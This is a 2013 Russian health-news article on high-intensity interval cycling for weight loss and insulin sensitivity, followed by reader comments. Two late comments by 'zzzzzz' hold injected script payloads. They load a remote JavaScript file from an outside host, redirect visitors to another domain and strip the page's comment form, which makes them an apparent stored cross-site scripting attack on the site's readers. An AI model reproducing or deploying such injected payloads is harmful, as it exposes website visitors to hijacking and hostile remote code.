Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Делай меньше, худей также...  >>  Делай меньше, худей также! Ученые разработали суперсхему
 
Обратная связь
 

Делай меньше, худей также! Ученые разработали суперсхему

Размер шрифта
06 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые разработали схему упражнений, благодаря которой можно худеть быстрее, расходуя меньше времени на тренировки.

Делай меньше, худей также! Ученые разработали суперсхему

Пока многие из нас потеют в тренажерных залах, ученые из Ливерпульского Университета Спорта и Бирмингемского Университета под руководством профессора Энтона Веджинмейкерза разрабатывают упражнения, которые могли бы занимать меньше времени.

В настоящее время Всемирная Организация Здравоохранения (ВОЗ) рекомендует людям любого возраста 3-5 часов в неделю заниматься спортом для укрепления здоровья, профилактики хронических заболеваний и снижения смертности. Однако многие просто не могут найти так много свободного времени.

В новом исследовании продолжают доказывать, что замена обычных длительных тренировок на Тренировки Высокой Интенсивности (НIT) благотворно действует на физическую форму и здоровье. Также происходит увеличение чувствительности тканей организма к инсулину

Врач Мэттью Кокс поясняет: «Увеличение чувствительности к инсулину происходит из-за увеличения доставки глюкозы и инсулина к мышцам и за счет сгорания жира в мышцах. Помимо всего прочего, мы обнаружили уменьшение ригидности крупных артерий, что снижает риск сосудистых заболеваний».

Схема упражнений HIT

Схема HIT доступна в любом возрасте и с любой физической подготовкой. Она включает в себя 15-60 секунд интенсивной езды на велотренажере, которые сменяются 2-4 минутами неторопливого кручения педалей. Можно заниматься на обычном велотренажере дома или в зале.

Недостаток времени – это главная причина, почему подавляющее большинство взрослого населения не выполняет рекомендуемое количество физических упражнений. HIT может решить эту проблему.

В исследование участвовали люди от 25 до 60 лет, которые ранее вели малоподвижный образ жизни. По их мнению, занятия на велотренажере приносят гораздо больше удовольствия, чем длительные изнуряющие тренировки.

HIT, по-видимому, может стать прекрасной альтернативой тяжелым тренировкам, скучному монотонному кручению педалей в зале, опасной езде на велосипеде по городу. HIT особенно полезно для пожилых людей, больных ожирением, гипертонией, диабетом и другими хроническими заболеваниями.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

06 мая 2013 в 11:17

Цитировать   |   Пожаловаться

Супер! Спасибо за статью. Только ошибка грубая в заголовке. Должно быть раздельно написано: "так же".

2 - Гость

06 мая 2013 в 11:19

Цитировать   |   Пожаловаться

Эх, и еще здесь: "В исследование участвовали люди от 25 до 60 лет..." Должно быть: "В исследованиИ..." Ну, просто жалко, когда в интересной и полезной информации грам. ошибки :((

Гость 06 мая 2013 в 11:17
ошибка грубая в заголовке
Вам спасибо за внимание и замечания. Редактору передали, поправим. 

4 - Гость

02 июня 2013 в 19:22

Комментарий удален за нарушение Правил общения

5 - Гость

09 февраля 2014 в 10:35

Цитировать   |   Пожаловаться

 кручу педали по 10 мин в день -половину времени интенсивно,другую медленно,три года прошло,но вес не меняется,так что все это ,что рекомендуют,не поможет!

6 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 23:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как есть, что угодно, и не переживать?   Когда делать зарядку, чтобы худеть быстрее   3 комплекса упражнений для похудения   Какие упражнения для похудения самые эффективные?  
03 мая 2013Делай меньше, худей также! Ученые разработали суперсхему 04 апреля 2013Когда делать зарядку, чтобы худеть быстрее
 
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 

Слайдшоу

1
Шагомер OMRON CaloriScan
Чего не делать, если вы набрали вес?
Как похудеть и не умереть

Тесты

1
Правильно ли вы худеете?
Что вы знаете о цистите?
Как контролировать бронхиальную астму
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.